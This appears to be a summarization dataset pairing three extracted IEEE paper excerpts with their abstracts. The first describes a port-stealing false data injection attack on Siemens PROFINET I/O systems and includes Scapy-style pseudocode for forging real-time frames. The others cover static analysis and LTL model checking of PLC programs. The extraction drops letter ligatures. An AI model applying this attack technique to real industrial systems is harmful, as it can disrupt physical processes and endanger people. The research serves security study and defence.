packets accordingly to achieve a fully MITM attack. 2) Injecting and Forwarding False Data: The nal step is to replace the I/O data exchanged between the stations with false data included in one of the already recorded frames. This is done by using our I/O database approach explained in section IV .A.2. Algorithm 1 gives the main core of our attack script used to inject false data. The algorithm is realized by a python script and the third party library used here is Scapy. As can be seen from algorithm 1, after interrupting the AR between the stations in the previous step, the attacker listens and receives a PNIO-RT frame in the very next PROFINET update cycle. The I/O Data eld of the frame received is then compared to the data elds of the already recorded frames existing in our I/O database, taking into account only frames recorded for the same communication direction. This com- parison process aims at nding an appropriate frame having different I/O data bytes to the one captured and is repeated starting from the rst frame in the database. Once a frame is found, its I/O data eld will be used as the new I/O data eld in our forged PNIO-RT packet, and the port stealing attack is then stopped. Finally the malicious packet that contains the false I/O data is forwarded to its nal destination. Please note that forwarding the crafted packet back to the network has two challenges. First, the malicious packet cannot be directly forwarded due to the fact that each PNIO- RT frame has a cycle counter see gure 4. The 2 bytes value that the cycle counter has is always read, and the number of missing packets between the consecutive cycles is set inside the TIA Portal software. To overcome this security challenge, the forged packet should always have the cycle counter value of the next expected PNIO-RT packet to be received at the nal destination. However, this is easy to be solved as the cycle counter values differ in a constant number always e.g. in our system the counter cycle number always increases by 256 per cycle. The second challenge is that after stopping the port stealing, the attacker should always win the race condition by sending the malicious PNIO-RT frame to the victim before the correct data is sent from the original source. In PROFINET I/O systems, the transmission interval (PROFINET update time cycle) divided into four phases named Send Clock as shown in gure 7. This parameter represents the frequency ofAlgorithm 1 FDI Attack based on I/O Database using Scapy Function Inject (iface=eno1, SrcPort) 1:packet = sniff (iface = eno1, timeout = cfg_sniff_time) 2:save_Pcap (packet, lter = 0x8892, Frame_id = 0x8000 , sniff.Pcap) 3:forpkt in rdpcap (sniff.Pcap) do 4: src_mac = pkt [1:6], dest_mac = pkt [7:12], data = pkt [17:56], coun_cyc = pkt [57:58], data_status = pkt [59] 5: if(src_mac 6=plc_src_mac) then 6: forp in rdPcap (inputs_Pcap le) do 7: if(data 6=load_packet (p[17:56])) then 8: fgd_data = load_packet (p[17:56]) break 9: end if 10: P = P+1 11: end for 12: else 13: forp in rdPcap (outputs_Pcap le) do 14: if(data 6=load_packet (p[17:56])) then 15: fgd_data = load_packet (p[17:56]) break 16: end if 17: P = P+1 18: end for 19: end if 20: ifdata 6=fgd_data then 21: break 22: end if 23: pkt = pkt + 1 24:end for 25:fgd_pkt = padd_pkt (raw (PNIORealTime (CycleCounter= coun_cyc + 256 , fgd_data, data_status, len = 60 ) 26:stop_port_stealing () 27:while time_slot() do 28: sendp(fgd_pkt, iface=eno1) 29:end while END Function exchanging data between the IO-Device and IO-Controller. In fact the PROFINET update time cycle results from the Send Clock Reduction Ratio. Therefore, a Send Clock of 1ms and a Reduction Ratio of 4 means that I/O data is sent every 4 ms. However, the Send Clock is normally set from 2 to 512 milliseconds and differs from one system to another based on their requirements. For the most industrial PROFINET I/O systems, the Send Clock is set at 128 milliseconds to avoid extreme network traf c overloads. Meaning that each PROFINET node gets updated every 0.5 second. By assuming that, the Send Clock in our example application is set to 128 milliseconds. Meaning that, the attacker needs to send his false data in less than 0.5 second to avoid updating the target PROFINET node with correct I/O data. V. R ESULTS AND DISCUSSION In this work, we test our false injection attack approach in the following two scenarios: - False Sensor Data: gure 8 describes this scenario. First the port is stolen from the PLC and as a consequence the PLC stops receiving any real-time data from the IE-CP and the data is redirected to the attacker. The packet received on the attacker machine is then compared and the I/O data bytes are replaced with false ones based on our I/O database. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. Fig. 7: PROFINET update time cycle cycle counter value is read and increased by 256 to match the expected counter value of the next PNIO-RT frame, before the port stealing attack is stopped. Finally, our forged packet is sent at the next PROFINET update cycle taking into account the race condition i.e. in less than 0.5 second. Fig. 8: False Data Injection against IO-Controller - False Actuator Value: gure 9 shows this scenario. We aim at manipulating the control command sent from the PLC to the IE-CP. Also here rst the port is stolen from the IO-Device, and as a result the real-time data is redirected to the attacker machine. The data bytes of the PNIO-RT packet received from the PLC are then compared to the ones in our I/O database, and are replaced with false data bytes in the forged packet. The cycle counter value is increased by 256, and the malicious packet is then replied back to the IO-Device after the port stealing is removed. As a consequence of executing our injection attack-chain against the example application given in section III, we managed successfully to trick the PLC by reading false sensor measurements (in the rst scenario) and the IE-CP by receiving false actuator values (in the second scenario). Our attack approach leads the tested PROFINET I/O system in both Fig. 9: False Data Injection against IO-Device scenarios to operate the physical process incorrectly depending on the false data frames chosen from our I/O database, keeping the infected system run at a certain operational state as long as the injection attack lasts e.g. the water exceeds the limits causing water over ow due to reading or acting false data values. However, In order to increase the success probability of such an attack, the PLC/CP should continually receive our crafted data rather than the original one, therefore the attacker needs to send each false data for more than one update cycle as seen in gure 8, 9. Furthermore, if the attacker keeps the port stealing attack run for a long duration, this will disturb the AR communication between the PLC and the CP, and our attack becomes a Denial-of-Service (DoS) not a false data injection (FDI). VI. C ONCLUSION AND FUTURE WORK In this paper, we presented a fully-blind false data injection attack against a PROFINET I/O system based on our new I/O database approach. for a practical implementation we performed our full attack-chain in two scenarios on a real hardware used in industrial settings. We found that the both target PROFINET I/O nodes in our testbed were tricked i.e. the IO-Controller by reading false sensor readings in the rst scenario, and the IO-Device by executing false control commands in the second scenario. As a result, the physical process controlled by the infected devices is run incorrectly, and the system remained operating at a certain state as long as the attacker keeps sending false data, depending on the data packet chosen from our I/O database. To mitigate the effect of such attacks, we highly recommend to improve the isolation from other networks [21], combined with the standard security practices [22]. Furthermore, the detection mechanism introduced in [20] might also be used Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. to prevent our attack scenarios. Their open-source intrusion detection framework is designed based on port stealing and PN-IO detectors. In the meantime the authors developed a so- called processor for Snort to react on PN-IO Ethernet frames which reveals any forged frame sent from an unauthorized user. However, in our opinion the best solution to make the industrial network more resistant to FDI attacks is when dif- ferent prevention mechanisms are in place e.g. a demilitarized zone (DMZ) and network segmentation to improve the attack prevention, and layered defense in depth strategy to further improve the detection of successful malicious injections. The exploit in this paper is ef cient but for our future work, we will investigate the ability to perform false data injection attack against modern S7 CPUs such as S7-1200 and S7-1500 PLCs. We are aware to the fact that attacking the PROFINET Systems based on modern PLCs is more challenging as Siemens claims that it provides its new devices with improved security means.
Summary:
This paper presents a fully blind false data injection (FDI) attack against an industrial eld-bus i.e. PROFINET that is widely used in Siemens distributed Input/Output (I/O) systems. In contrast to the existing academic efforts in the research community which assume that an attacker is already familiar with the target system, and has a full knowledge of what is being transferred from the sensors or to the actuators in the remote I/O module, our attack overcomes these strong assumptions successfully. For a real scenario, we rst sniff and capture real time data packets (PNIO-RT) that are exchanged between the IO-Controller and the IO-Device. Based on the collected data, we create an I/O database that is utilized to replace the correct data with false one automatically and online. Our full attack- chain is implemented on a real industrial setting based on Siemens devices, and tested for two scenarios. In the rst one, we manipulate the data that represents the actual sensor readings sent from the IO-Device to the IO-Controller, whereas in the second scenario we aim at manipulating the data that represents the actuator values sent from the IO-Controller to the IO-Device. Our results show that compromising PROFINET I/O systems in the both tested scenarios is feasible, and the physical process to be controlled is affected. Eventually we suggest some possible mitigation solutions to secure our systems from such threats.
|
Summarize:
I. Introduction In industry, automation and control tasks are frequently operated using programmable logic controllers (PLCs). This paper describes the experience of the authors while adapting the Arcade.PLC1framework as described by Biallas et al. in [1] for use with the ABB Compact Control Builder control application development environment. The goal of this project was to apply static analysis techniques to programming languages of the IEC 61131-3 standard [2] used in ABB Compact Control Builder in order to improve the development process of control applications. Software development environments for IEC 61131-3 lan- guages often lack any support for static code analysis, except for error messages during compilation. There are some commercial tools available for checking syntactic properties of control applications or individual modules. However, these tools only check very basic properties (e. g., coding guidelines) [3] and are not integrated into the development environment. While the latter is often intended, e. g., to avoid recerti cation of safety-related software tools, the very basic nature of existing tools might also be rooted in a lack of awareness about the capabilities of formal methods in the automation domain. Improving this awareness was part of the motivation for the work described in the following. II. ABB Compact Control Builder and Arcade.PLC ABB Compact Control Builder is an ABB tool to develop control applications for AC 800M automation controllers. This family of control devices is used for the automation of complex industrial processes, e. g., in the chemical industry. While the 1Aachen Rigorous Code Analysis and Debugging Environment for PLCscore languages used in Compact Control Builder are a subset of the languages de ned in IEC 61131-3, there are certain extensions to the standard. This includes instantiation rules, e. g., singleton function blocks, and means to specify the order in which function blocks in an aggregated type are executed. One distinguishing factor of the AC 800M controller, and thus the respective Control Builder tools, is the use of native code execution. This means that all control programs are compiled from source code into binary machine code before deploying them to the controller. This includes all function block types and other modules provided as reusable libraries, except for certain rmware functions. The latter are part of the runtime environment of the controller. However, Compact Control Builder libraries are not distributed in compiled form, but as source code. To avoid modi cations and inappropriate use of library components by control engineers developing a control application, the source code les are encrypted. Depending on the level of protection, this encryption can include only the internal code or the complete interface of the components. In both cases, Compact Control Builder decrypts the libraries to perform the compilation from source code into native code. Arcade.PLC is a framework for the analysis and veri cation of programs for PLCs. Unmodi ed PLC programs in the languages Instruction List, Function Block Diagram, and Structured Text can be supplied by the user of the tool. Then, one function, function block or program can be selected formodel checking or static analysis. Arcade.PLC allows for specifying the intended functionality of function blocks or control programs using di erent logics as speci cation language. The integrated model checker can then prove or refute that a program conforms to the given speci cation. The otherkey aspect of Arcade.PLC is static analysis using abstract interpretation [4], which is the main focus of this paper. Figure 1 depicts the static analysis process of Arcade.PLC. Each program is rst translated into an intermediate representation (IR). This IR only contains simple instructions (assignments, jumps, conditional jumps, calls). It normalizes di erent PLC languages and simpli es further analyses. Then, a control ow graph (CFG) is build from the IR. This CFG is then analyzed with a ow-sensitive, partly context-sensitive abstract interpretation framework that annotates each node of the CFG with abstract values for the relevant variables. This information is processed by the check engine which executes a set of prede ned checks. If a violation is detected, the IR is mapped back to the original source code position and the warning is presented to the user. 2014 IEEE Emerging T ec hnology and F actory Automation (ETF A) 978-1-4799-4845-1/14/$31.00 c/circlecopyrt 2014 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply. $ % ! % # Fig. 1. The static analysis process of Arcade.PLC [5] III. Non-Technical Challenges A. Understanding the Domain Understanding the domain of industrial automation is a key challenge for deploying static analysis techniques in this context. One very important aspect is that the development practices for control applications di er from those used in companies only dealing in software. The di erent approach to software development in the automation domain prohibits applying existing o -the-shelf solutions for general purpose programming languages. One very obvious reason for this is the use of domain-speci c programming languages, e. g., those de ned in IEC 61131-3, but the di erences go beyond that. In most cases, control programs aim to mimic the real-world and the components they are interacting with. This leads to a software development process which is based on frequent reuse of standard components to control certain parts of the system. When a program is written for a concrete system, these components are just instantiated, con gured, and connected in an appropriate way. As the developer of an application might not know all internal details of the instantiated components, there is a large potential for programming errors. On the other hand, the relative simplicity of the IEC 61131-3 languages makes them attractive for analysis. The troublesome features of other programming languages, e. g., pointers, ref- erences, and dynamic memory allocation, are not present inthese languages. Although when looking at real-world code, the hardness of this claim is softened, as there are extensions which introduce these features. Overall, the semantics of the languages used in control applications is straightforward and thus, they are easy to analyze. B. Expectations vs. Reality While most development environments for control appli- cations claim to follow the IEC 61131-3 standard [2], in practice each vendor modi es and extends on the programming languages de ned in the standard. This also applies to ABB Compact Control Builder. One very obvious deviation from IEC 61131-3 standard is that the interface and the internal variables of a function block are not de ned in the source code itself, but using specialized tables which are part of the development environment. Thus, this information has to be extracted from proprietary XML les. It can also be accessed using a special interface based on .net technology. As Arcade.PLC is based on Java, we chose not to use this interface and work on the XML les directly.We encountered one intricate extensions which makes Compact Control Builder programs syntactically incompatible with the existing Structured Text parser in Arcade.PLC: for a certain type of variable, it is possible to append the su x :status to scan their internal state. As the operator :can usually only occur within switch-statements, the existing parser reported the use of this feature as an error. One important lesson we learned is that in the end, real- world code is the best way to learn how software developers in a certain domain write code. Therefore, it is also the best way to identify the common use of programming languages as well as corner cases, which usually come with little documentation. Extensions like the previously described examples exist in many other development tools used in the automation domain as well. C. Access to Real-World Code The automation domain, in particular in the form of Compact Control Builder, comes with additional pitfalls when accessing source code for analysis. These pitfalls have organiza-tional and historical reasons. While all function block libraries are distributed as source code, the libraries are protected by encryption to avoid modi cation of the source code by the users of a library. This protection was introduced since modi cation by control engineers let to problems when di erent versions of a library were used for control applications which were relying on uno cial patches. Essentially, the fact that this encryption feature is necessary highlights that there is a lot of potential for improvement in the development process of control software. The missing information in encrypted libraries directly translates into a technical challenge: since libraries can be completely encrypted, even the signature of the function blocks in some libraries are not available for an external tool. Thus, the static analysis engine must derive an appropriate signature for types from encrypted libraries based on the way they are used in the unencrypted parts of the source code. During the adaption of Arcade.PLC for ABB Compact Control Builder, it was often not clear whether warnings were triggered by aws in the analysis or by missing information. This in turn let to a large amount of manual inspection of the source code. This issue could have been resolved by using unencrypted versions of the respective libraries, but this was not possible for all of them in the course of the project. IV . Technical Challenges A. Hidden Complexity At rst glance, many control application seem like a straightforward composition of relatively simple programorganizational units (POUs) with a dedicated functionality. However, since a control program can consist of many hundred POUs, the total number of lines of code in a program easily reaches tens of thousands. Furthermore, function block instanceshave their own internal variables and can interact through global variables. Thus, the state space to be handled by a static analysis tool can be very large. This complexity prohibits the use of simplistic analysis techniques for real-world applications. Additionally, the way function block calls are handled introduces even more variables: There are basically two ways to call a function block in most PLC languages. In the rst version, input and output parameters are passed directly (either given formal parameter names or as values only). Another, semantically equivalent way to call A function block, is to Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply. access the input and output parameters outside the call, such as: functionblock.input1 := 1; functionblock.input2 := a; functionblock(); result := functionblock.output; When implementing a static analysis which considers the data ow between function blocks, the above syntax entails that the input and output variables of every function block instance are accessible from its parent function block. For programsof realistic size, this makes the potential state space to be covered by an accurate static analysis very large. To reduce the amount of variables which have to be tracked, we use a pre- analysis for determining which variables of a function block areactually accessed in the remainder of the program [5] and only considers these variables during the analysis. This technique enables the analysis of complex programs in Arcade.PLC while still providing very accurate results, e. g., with respect to the possible value ranges of variables. B. Identifying Useful Analyses During the adaption of Arcade.PLC for Compact Control Builder we implemented checks for the following runtime errors and code smells: Conditions with constant result Illegal access into arrays or structured data types V ariables with constant values Missing case labels in switch statements Unreachable code Division by zero Most of these checks are based on well-known static analysis techniques and all of them are clearly useful from an academic perspective. However, not all of these checks yielded equally usable results in practice. All of these checks rely on the capability of Arcade.PLC to approximate the possible value range for all variables in a program. Based on this information, the additional checks can derive additional properties of a control program, e.g., that a conditional statement always yields the same result or that the value of a variable is constant. The remainder of this section will focus on the rst three checks. With respect to the check for conditions yielding a constant result, the following piece of control code shows a pattern which we frequently encountered during our case study: 42IfCONDITION1 Then 43 OUTPUT := 65535; 44ElsIf CONDITION2 Then 45 OUTPUT := INPUT1 And(INPUT2 Or(INPUT3 Xor65535)); 46ElsIf Not CONDITION2 Then 47 OUTPUT := INPUT1 And(INPUT2 Or(INPUT3 Xor0)); 48End_If; Checking the condition in line 46 is obviously super uous,as the condition in line 46 is the negation of the condition checked in line 44. Since line 46 can only be reached if the condition in line 44 is false, its condition will always be true. A simple else-statement would thus su ce in line 46 to preserve the original semantics of the code. Nonetheless, Arcade.PLC correctly reported that the condition in line 46 yields a constant result. However, since essentially every else-statement in the projects we analyzed was written in this way, this resulted in a larger number of reported warnings, which were not realproblems in the code. Thus, we ultimately chose to deactivate the analysis for conditions with constant results to make the number of warnings manageable. In addition, Compact Control Builder programs can make use of the rmware functions GetStructComponent and PutStructComponent . They allow accessing the n-th compo- nent of a structured data type. If nis less than 1 or greater than the number of elements in the structured data type, a runtime error is signaled during program execution. It is also checked if the accessed element has the wrong type. To allow for o ine checking of correct usage of these functions, Arcade.PLC rst determines the value range of the index expression of the respective calls. This is then used to check whether there are structure elements for all possible values of the indexexpression. If this is not the the case, a warning is issued. Additionally, it is also checked if all structure elements in the range described by the index expression have the correct type. The rst check is only an adaption of a well-known array index out of bounds check to these rmware functions. The second check, however, is a domain-speci c analysis which is able to detect an additional class of runtime errors statically. Two checks for constant variables were added to Ar- cade.PLC. The basic version only checks whether a variablenever changes its value over the execution of the program, while the more advanced version checks whether the constant variable is also used in a statement which should modify its value, e. g., an assignment. The rst variant only indicates a stylistic issue, while the second variant usually indicates a more severe problem in the code. During our case study, we encountered one function block where both types of warnings for constant variables were triggered. The respective variables were declared as follows: CLOCK : time := T#1m; COMPARE : int := 5; The rst variable CLOCK is a rather typical constant containing the value 1 minute and is used as a parameter for, e. g., timers. Compact Control Builder o ers the possibility to declare constants as so-called project constants , such that they are no longer variables. For projects that make use of this feature, this warning could identify other candidates that should be moved into the project constants. However, during our case study we learned that this is often not done intentionally to adjust certain values during commissioning of a system. For the other variable COMPARE , the warning was triggered that this variable contains a constant value, but is also written. It is only written in the following statement: COMPARE :=max(COMPARE,2); SinceCOMPARE is initialized to 5, the call to max will return 5, which, in turn, will not change the value of the variable. The above example illustrates how the result of static analyses can interact to implement further checks. The information about the constant value of COMPARE is combined with the information thatCOMPARE is used in an assignment statement. Furthermore, the example also demonstrates that the software engineering practices used for the development of control applications, e. g.,using variables to store constants which can be ne-tuned during commissioning, has a signi cant impact on the usefulness of certain static analyses. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply. Program #loc #FBs time #W 1 #W 2 #FP App1 / Program1 233 3<1s 6 0 0 App2 / Program2 2776 100 11 s 0 8 0 App2 / Program3 169 5 3 s 0 0 0 App2 / Program4 2684 100 146 s 0 301 0 App2 / Program5 206 12<1s 0 0 0 App3 / Program6 344 12<1s 3 0 0 App4 / Program7 3339 18 40 s 9 50 9 TABLE I. P art of the case study with anonymized program names V. C aseStudy After adapting Arcade.PLC, we were able to successfully apply it to a real-world control project comprising multiple networked PLCs. This project consisted of roughly 20 applica- tions and about 50,000 lines Structured Text (ST) code. The applications are further partitioned into programs, which share access to the same set of global variables. The programs and function blocks had between 100 and 3500 lines of ST and the programs contained up to 100 function block instances. Each of the applications had about 1000 global variables. Thus, analyzing the possible value ranges for all variables in the project was particularly challenging. Nonetheless, the complete runtime of the static analysis and the check engine on the entire project was only about 10 minutes. The anonymized results of a sample application from this case study are shown in Tab. I. The table shows the program we checked, the lines of ST code of the program (not including functions and function blocks used in the program), the numberof function blocks used (#FBs), the time for running the static analysis, the number of warnings in the main program (#W 1), the number of warning in other organization units (e. g., functionblocks) of the program (#W 2), and the number of false positives (#FP) in #W 1. All our checks were con gured in such a way that they could trigger in every location of the program including the function blocks that are used in the program. This, however, triggered warnings in these function blocks (summarized in #W 2). These warnings were raised for conditions that were always true/false and resulting in unreachable code in the function block instance. They arise because not every functionality of a function block is necessarily used in the main program. A function block might, e. g., have an input Enable to control the activation of some function. If the main program always needs this function, this input is hard-wired to true resulting in the warning condition is always true at the corresponding IF Enable THEN statement in the function block due to our context-sensitive analysis. Therefore we disabled these warnings for the function block instances used in the main program. We also disabled the warning for constant variables and only raised warnings for constant variables that are also written. After this ne-tuning, it turned out that the number of warnings and the number of false-positives was reasonably low. The remaining warnings were stylistic issues, e. g., redundant compares and disabled code, which had to be inspectedmanually. We also found a copy&paste error in Program6, in which a wrong variable name was used in one place causing unreachable code. In Program7, we got false positives for out- of-bounds accesses inside a loop. These false positives could be eliminated by introducing relational domains to our analysis,meaning also tracking the dependencies between variables. This is planned to be added in the future.VI. Related Work To the best of our knowledge, Bornot et al. [6] were the rst to describe static analysis techniques for PLC programs using an abstract interpretation framework which is similar to the one used in Arcade.PLC. Their approach, however, is limited to small programs written in Instruction List. Prahofer et al. [3] give an overview about di erent static code analysis techniques and their bene ts for IEC 61131-3 programs. Their approach is concerned with detecting bad programming practices (naming conventions, program complexity, code smells, dead locks) while our approach infers the possible values of all program variables to detect semantic programming errors. In their paper, they also give an assessment of the available commercial tools for static PLC code analysis, which, at the moment, seem to focus on syntactic checks only, e. g., the complicance with certain naming convention for variables. VII. Conclusion This paper reported on the adaption of an academic tool for static code analysis to a development environment for real- world control applications. After overcoming a multitude of challenges, both technical and non-technical, we were ableto apply static code analysis on a large software project foran industrial control system. What we learned is that when putting theory to practice, results will not always be as expected. Not every analysis which looks useful in theory can ful ll this promise in practice. On the other hand, looking at real- world code can inspire new analyses and triggers the need to optimize existing analysis techniques. We therefore believe that applying static analysis tools on large real-world projects helps tremendously in improving these tools. Whenever possible, information about the application domain should be considered. This includes considering the end user of an analysis tool. An ideal static analysis should be useful for someone who doesnot understand the underlying theories. Ultimately, practical usefulness trumps ideas which only exist on paper or can only be used by an expert in the eld. Acknowledgements This work was supported, in part, by the DFG research training group 1298 Algorithmic Synthesis of Reactive and Discrete-Continuous Systems and by the DFG Cluster of Ex- cellence on Ultra-high Speed Information and Communication,German Research Foundation grant DFG EXC 89. Further, the work of Sebastian Biallas was supported by the DFG.
Summary:
Static code analysis techniques are a well- established tool to improve the e ciency of software developers and for checking the correctness of safety-critical software com- ponents. However , their use is often limited to general purpose or mainstream programming languages. For these languages, static code analysis has found its way into many integrated development environments and is available to a large number of software developers. In other domains, e. g., for the programming languages used to develop many industrial control applications,tools supporting sophisticated static code analysis techniques arerarely used. This paper reports on the experience of the authors while adapting static code analysis to a software development environment for engineering the control software of industrialprocess automation systems. The applicability of static codeanalysis for industrial controller code is demonstrated by a casestudy using a real-world control system.
|
Summarize:
I. INTRODUCTION Using programmable logic controllers (PLC) in systems managing complex industrial processes imposes strict correctness requirements upon the PLC programs. Any software error in a PLC program is considered inadmissible. However, the existing PLC program development tools, for instance, the widely known CoDeSys (Controller Development System) package [7], merely provide the ordinary possibilities of program debugging through testing (not guaranteeing total absence of errors) by means of visualizing the PLC controllable objects. At the same time, certain theoretical knowledge along with experience of using existing designs, has been accumulated in formal modeling methods and software system analysis field. The programming of logic controllers is an applied field, in which existing designs can be applied successfully. Successful application is understood as the introduction of formal methods into program development process as a proven technology, which is clear to all specialists involved in this process: engineers, programmers and testers. PLC-programs are normally small, have a finite-state space, and are exceptionally convenient objects for the formal (including automatic) correctness analysis. Programmable Logic Controllers (PLCs) are a specific type of computer used widely in modern industry (in automation systems) [9], [4]. A PLC is a reprogrammable computer based on sensors and actors, which is controlled by by a user program. They are highly configurable and thus are applied to various industrial sectors. PLCs are a classic example of reactive systems. A PLC periodically repeats the execution of the user program. There are three major phases of program execution (working cycle): 1) reading from inputs (sensors); 2) program execution; 3) writing to outputs (actors). Programming languages for logic controllers are defined by the IEC 61131-3 standard. This standard includes the description of five programming languages: SFC, IL, ST, LD and FBD. These languages provide a possibility of applying all existing methods of program correctness analysis testing, theorem proving [8] and model checking [6] for verification of PLC programs. Theorem proving is more applicable to continuous stability and regulation tasks of the engineering control theory, since the implementation of these tasks on a PLC is associated with programming a relevant system of formulas. The model checking method is most suitable for discrete tasks of logic control requiring a PLC with binary inputs and outputs. This provides a finite space of possible states of the PLC program. The most convenient languages for programming, specification and verification of PLC programs are ST, LD and SFC as they do not present difficulties for either developers or engineers and can be easily translated into the languages of software tools for automatic verification. Earlier in [2] a review of methods and approaches to programming discrete PLC problems was provided based on the example of a problem of modeling a code lock control program. The usability of the model checking method for program correctness analysis with respect to the Cadence SMV automatic verification tool [12] was evaluated. Some possible PLC program vulnerabilities that surface when traditional approaches to programming, are used were revealed. This article proposes an approach to modeling and verification of discrete PLC programs. To specify program behavior, we use the linear-time temporal logic, LTL. The programming is carried out in the ST language according to the LTL specification. The LTL specification correctness analysis is carried out by the Cadence SMV symbolic model checking tool. We demonstrate a new approach to programming and verification of PLC programs. A discrete problem is provided with an ST program, its LTL specification, and an SMV model. The purpose of the article is to describe an approach to programming PLCs, which would provide a possibility of PLC 2013 Tools & Methods of Program Analysis 978-0-9860-7731-9/14 $31.00 2014 DOI 10.1109/TMPA.2013.1015 2013 Tools & Methods of Program Analysis 978-0-9860-7731-9/14 2014 Exactpro Systems, LLC All rights reserved DOI 10.1109/TMPA.2013.1015 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. program correctness analysis by applying the model checking method. Further work includes building software tools for modeling, specification, construction and verification of PLC programs. II. MODEL CHECKING . A PLC PROGRAM MODEL Model checking is the process of verifying whether a given model (a Kripke structure) satisfies a given logical formula. A Kripke structure represents the behavior of a program. A temporal logic formula encodes the property of the program. The linear-time temporal logic (LTL) is used. A Kripke Structure on a set of atomic propositions P is a state transition system S=S=(S, s 0, , L), with a non-empty set of states S, an initial state s0 S, a transition relation S S , which is defined for all s S, and a function L:S 2 P, labeling every state by a subset of atomic propositions. The Path of the Kripke structure from the state s 0 is an infinite sequence of states =s 0s1s2 where i 0 s i s i+1. The linear-time temporal logic language is considered as a specification language for behavioral properties of a programming model. PLC is a classic reactive control system, which, once running, must always have the correct infinite behavior. LTL formulas allow representing this behavior. The syntax of the LTL formula is given by the following grammar, pi P: , ::= true | p 0 | p 1 | | p n| | | X | U | F | G The LTL formula describes the property of one path of the Kripke structure, starting from some emphasized current state. The temporal operators X, F, G and U are interpreted as follows: X means that must hold in the next state, F means that must hold in some future state of the path, G means that must hold in the current state and all future states of the path, U means that must hold in the current or a future state, and must hold until this point. In addition, classic logical operators and will be used further on. A Kripke structure satisfies an LTL formula (property) , if holds true for all paths, starting from the initial state s . A Kripke model for a PLC program can be built quite naturally. For a state of the model we are taking a vector of values of all program variables, which can be divided into two parts. The rst part is a value vector of inputs at the starting moment of a new PLC working cycle. The second part is a value vector of outputs and internal variables after a complete working cycle (on the inputs from the rst part). In other words, the state of the model is the state of the PLC- program after a complete working cycle. Thus, a transition from one state to another depends on the (previous) values of the outputs and internal variables of the rst state and the (new) values of inputs of the second state. For each state, the degree of the transition relation branching is determined by the number of all possible combinations of PLCs input signals. Atomic propositions of the model are logical expressions on the PLC program variables with the use of arithmetic and relational operators. III. PROGRAMMING CONCEPT The purpose of the article is to describe an approach to programming PLCs, which would provide a possibility of PLC program correctness analysis by means of the model checking method. We will proceed from convenience and simplicity of using the model checking method. It is necessary that the two following conditions hold true. Condition 1. The value of each variable must not change more than once per one full run of the program during the PLC working cycle. Condition 2 . The value of each variable must only change in one place of the program in some operation block without nestings. It is obvious that one run of the working cycle either increases, decreases or does not change the value of any variable. We will change the variable value only when it is really necessary, i.e. we will forbid the assignment of value access to the variable, if conditions of mandatory change of its value are not fulfilled. In this approach, the requirements for changing the value of a certain V variable after one run of the PLC working cycle are represented by the following LTL temporal logic formulas. The following LTL formula is used for describing the situations leading to an increase of the V variable value: GX (V>_V OldValCond FiringCond V =NewValExpr) (1) This formula means that whenever a new value of the V variable is larger than its previous value, recorded in the _V variable, it follows that the old value of the V variable satis es the OldValCond condition, the condition of the external FiringCond action is fulfilled, and the new value of the V variable is the value of the NewValExpr expression. The leading underscore symbol _ in V variable is taken as a pseudo-operator. It allows referring to the previous state value of the V variable. The pseudo-operator can be used only under the scope of the X temporal operator. The FiringCond and OldValCond conditions are logical expressions over program variables and constants, which are constructed using comparison operators, logical and arithmetic operators and the _ pseudo-operator. By definition the pseudo-operator can be applied only to variables. The FiringCond expression describes the situations where changing the value of the V variable is needed (if it is allowed by the OldValCond condition). The NewValExpr expression is built using variables and constants, comparison, logical and arithmetic operators and the _ pseudo-operator. For descriptions of all possible situations increasing value, this formula may have several sets of considered conjunctive parts OldValCond i FiringCond i V=NewValExpr i , combined in a disjunction, after the operator. Situations that lead to a decrease of the V variable value are described similarly: GX(V>V OldValCond FiringCond V=NewValExpr ) (1 ) Temporal formulas of the (1) and (1 ) type describe the desired behavior of some integer variable. A more simple LTL 16 16 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. formula is proposed in case of a logical (binary) data type variable. The following formula describes the situations where the value of a binary V variable increases: GX( _V V=>FiringCond) (2) Situations that lead to a decrease of the V variable value are described similarly: GX(_V V=>FiringCond`) (2 ) Let us look at the special case of specifying the (1) and (1 ) type where for V we have FiringCond = FiringCond = 1, NewValExpr = NewValExpr , OldValCond = (V < NewValExpr) and OldValCond = (_V > NewValExpr): GX(V>_V _V<NewValExpr V=NewValExpr); GX(V<_V _V>NewValExpr V=NewValExpr). Such a specification can be replaced by the following LTL formula: GX(V=NewValExpr) (3) The V variable, for which the specifications of the (1) and (1 ) type and the (2) and (2 ) type are built, will be called a register variable. If a speci cation of the (3) type is built, V is called a function variable . In the special case of speci cation (3), where the NewValExpr expression does not contain the _ leading underscore pseudo-operator, the V variable is called a substitution variable. It is important to note that each of the LTL formula templates is constructive, i.e. by following the specification one can easily build a program that would conform to the temporal properties expressed by these formulas. Thus, we can say that PLC programming comes down to building a behavior specification of each program variable whether it is an output or an auxiliary internal variable. The process (stage) of writing program code is completed when a speci cation for each such variable is created. Note that the quantity and meaning of output variables are de ned by the PLC and the problem statement. Such an approach to PLC programming somewhat solves the speci cation completeness problem. In this case, program speci cation is divided into two parts: 1) speci cation of the behavior of all program variables (except inputs), 2) speci cation of common program properties. The second part of speci cation affects the quantity and the meaning of internal auxiliary PLC program variables. While building a speci cation, it is important to take into consideration the order of temporal formulas describing the behavior of the variables. A certain variable without the _ pseudo-operator may be involved in the speci cation of another variable behavior only if the speci cation of its behavior is already completed and is in the text above. If necessary, we will use the Init keyword to indicate the variable s initial value. For example, Init(V) = 1 means that the V variable is initially set to 1. If the initial value of some variable is not de ned explicitly, it is assumed that this value is zero. IV. PROGRAMMING BY SPECIFICATION In this section we will explore a way of building a program ST-code according to the constructive LTL-specification of the program variable behavior. In general, the translation scheme of LTL formulas into the ST-code is the following. Two temporal formulas of the V variable, marked V+ (value increase, (1)) and V- (value decrease, (1 )) are set in conformity to the IF-ELSIF text block in the ST language IF OldValCond AND FiringCond THEN V := 